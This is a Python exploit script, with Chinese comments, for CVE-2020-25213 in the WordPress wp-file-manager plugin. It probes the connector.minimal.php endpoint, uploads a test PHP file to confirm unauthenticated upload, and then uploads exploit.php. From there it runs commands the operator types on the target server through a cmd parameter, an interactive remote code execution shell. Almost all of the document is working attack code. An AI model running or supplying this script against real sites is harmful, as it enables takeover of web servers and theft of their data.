headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/91.0.4472.124 Safari/537.36 "}

url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"payload = "?cmd="""" 漏洞验证_1 检测响应中是否有errUnknownCmd"""def Check_1(url): url_2 = url + url_tail res1 = requests.get(url=url_2, headers=headers) text1 = res1.text text2 = json.loads(text1) key = json.dumps(text2) # 将json转换为字符串 print(text2) key1 = "errUnknownCmd" if key1 in key: print("疑似漏洞存在") Next = input("是否进一步验证 Y or N :") if Next == "Y": Check_2(url) else: print("漏洞不存在")

""" 漏洞验证_2 访问上传的php文件是否有正确响应 这里上传的php文件内容："""def Check_2(url): data = { 'cmd': 'upload', 'target': 'l1_', } files = { 'upload[0]': open('phpinfo.php', 'rb'), } url_3 = url + url_tail res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False) if res.status_code == requests.codes.ok: # print("上传成功！") d = res.json() p = d.get('added', [])[0].get('url') Finally_url = f'{url}{p}' res2 = requests.get(url=Finally_url, headers=headers) key2 = "PHP Version" if key2 in res2.text: print("CVE-2020-25213漏洞存在！ ") flag = input("是否进行漏洞利用 Y or N :") if flag == "Y": while 1: command = input("输入执行的命令： ") if command == "exit": break exploit(url, command) else: print("漏洞不存在！")

""" 漏洞利用 上传php文件并调用命令执行 exploit.php内容："""def exploit(url, command): data = { 'cmd': 'upload', 'target': 'l1_', } files = { 'upload[0]': open('exploit.php', 'rb'), } url_2 = url + url_tail file_status = url + upfiles_path + "/exploit.php" res = requests.get(url=file_status, headers=headers, verify=False) if res.status_code == requests.codes.ok: Fin_url = file_status + payload + command res3 = requests.get(url=Fin_url, headers=headers) res3.encoding = 'gbk' print(res3.text)

else: res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False) if res2.status_code == requests.codes.ok: # print("上传成功！") d = res2.json() p = d.get('added', [])[0].get('url') url_3 = f'{url}{p}' Fin_url = url_3 + payload + command res2 = requests.get(url=Fin_url, headers=headers) res2.encoding = 'gbk' print(res2.text)

def main(): url = input("输入测试的URL：") Check_1(url)

if __name__ == '__main__': main()